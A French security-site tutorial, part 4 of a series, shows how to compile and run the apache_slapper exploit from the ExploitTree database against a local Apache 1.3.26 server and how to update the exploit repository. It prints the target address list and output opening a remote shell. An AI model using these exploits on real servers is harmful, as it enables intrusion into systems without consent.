Contribuez à SecuObs en envoyant des bitcoins ou des dogecoins.
Nouveaux articles (fr): 1pwnthhW21zdnQ5WucjmnF3pk9puT5fDF
Amélioration du site: 1hckU85orcGCm8A9hk67391LCy4ECGJca

Contribute to SecuObs by sending bitcoins or dogecoins.



[ExploitTree : une base d'exploits & un framework – Partie 4] Exemple & mises à jour

Par Rédaction, secuobs.com
Le 14/11/2007


Résumé : Exemple d'utilisation avec l'exploit apache_slapper de la base ExploitTree sur un système d'exploitation de type GNU/LINUX Debian. Retrouvez également la procédure de mise à jour des exploits contenus dans cette base.



L'utilisation du code « apache_slapper » correspondant à l'exploitation d'un serveur web de type Apache en version 1.3.26 configuré sur la boucle locale (127.0.0.1) d'une machine présentant un système d'exploitation de type GNU/LINUX Debian se fait de la façon suivante :

root@tuktuk:~/ExploitTree/ExploitTree # cd application/webserver/apache/

root@tuktuk:~/ExploitTree/ExploitTree/application/webserver/apache # grep compile apache_slapper.c
compile: gcc -o apache-ex apache.ex.c -lcrypto

root@tuktuk:~/ExploitTree/ExploitTree/application/webserver/apache # gcc -o apache_slapper apache_slapper.c -lcrypto

root@tuktuk:~/ExploitTree/ExploitTree/application/webserver/apache # ls apache_slapper
apache_slapper

root@tuktuk:~/ExploitTree/ExploitTree/application/webserver/apache # ./apache_slapper

AVAILABLE TARGETS: 1) Gentoo, apache, 0x08086c34 2) Debian, apache 1.3.26, 0x080863cc 3) Red-Hat, apache 1.3.6, 0x080707ec 4) Red-Hat, apache 1.3.9, 0x0808ccc4 5) Red-Hat, apache 1.3.12, 0x0808f614 6) Red-Hat, apache 1.3.12, 0x0809251c 7) Red-Hat, apache 1.3.19, 0x0809af8 8) Red-Hat, apache 1.3.20, 0x080994d4 9) Red-Hat, apache 1.3.26, 0x08161c14 10) Red-Hat, apache 1.3.23, 0x0808528c 11) Red-Hat, apache 1.3.22, 0x0808400c 12) SuSE, apache 1.3.12, 0x0809f54c 13) SuSE, apache 1.3.17, 0x08099984 14) SuSE, apache 1.3.19, 0x08099ec8 15) SuSE, apache 1.3.20, 0x08099da8 16) SuSE, apache 1.3.23, 0x08086168 17) SuSE, apache 1.3.23, 0x080861c8 18) Mandrake, apache 1.3.14, 0x0809d6c4 19) Mandrake, apache 1.3.19, 0x0809ea98 20) Mandrake, apache 1.3.20, 0x0809e97c 21) Mandrake, apache 1.3.23, 0x08086580 22) Slackware, apache 1.3.26, 0x083d37fc 23) Slackware, apache 1.3.26, 0x080b2100 Usage: ./apache-ex <IP>

root@tuktuk:~/ExploitTree/ExploitTree/application/webserver/apache # ./apache_slapper 127.0.0.1
Exploiting 127.0.0.1 , nebunu rulez!
Connecting to shell on port 30464
>



Pour mettre à jour la base d'exploits :

root@tuktuk:~/ExploitTree # ./ExploitTree.pl anonymous

ExploitTree Client Utility Manager v0.6
----------------------------------------

1) Initialize (first time download)
2) Update Repository
3) Print Exploit Statistics
q) Quit

> 2
Password is blank (press enter), then wait...

Logging in to :pserver:anonymous@cvs.securityforest.com:2401/home/security
/cvsroot
CVS password:
cvs checkout: Updating ExploitTree
...
...
...
Quiting...



2682 exploits faisaient parti de l'archive CVS lors de la première Rédaction de ce document :

root@tuktuk:~/ExploitTree # ./ExploitTree.pl anonymous

ExploitTree Client Utility Manager v0.6
----------------------------------------

1) Initialize (first time download)
2) Update Repository
3) Print Exploit Statistics
q) Quit

> 3
Please wait while calculating...
Total Exploits: 2682


Hit Enter to continue>

ExploitTree Client Utility Manager v0.6
----------------------------------------

1) Initialize (first time download)
2) Update Repository
3) Print Exploit Statistics
q) Quit

> q
Quiting...



A noter que l'ensemble de ces codes est également disponible via l'interface du site de SecurityForest ( lien ). Les exploits sont délivrés pour l'apprentissage de la sécurité informatique, ils sont à utiliser uniquement à l'encontre d'infrastructures vous appartenant, un usage contraire est sévèrement puni par la loi ; amende conséquente et peine de prison assortie.


Webographie :

milw0rm ( lien )

SecurityFocus (lien

PacketStorm ( lien ).

SecurityForest ( lien )

CVS ( lien )

ExploitTree WIN32 ( lien )

ExploitTree ( www.securityforest.com/downloads/ExploitTree-pl.tar.gz )

Dos2unix ( lien )

Interface en ligne SecurityForest ( lien )


Autres ressources dans ce dossier :

[ExploitTree : une base d'exploits & un framework – Partie 1] Présentation – lien

[ExploitTree : une base d'exploits & un framework – Partie 2] Installation et environnement - lien

[ExploitTree : une base d'exploits & un framework – Partie 3] Fonctionnement et recherches – lien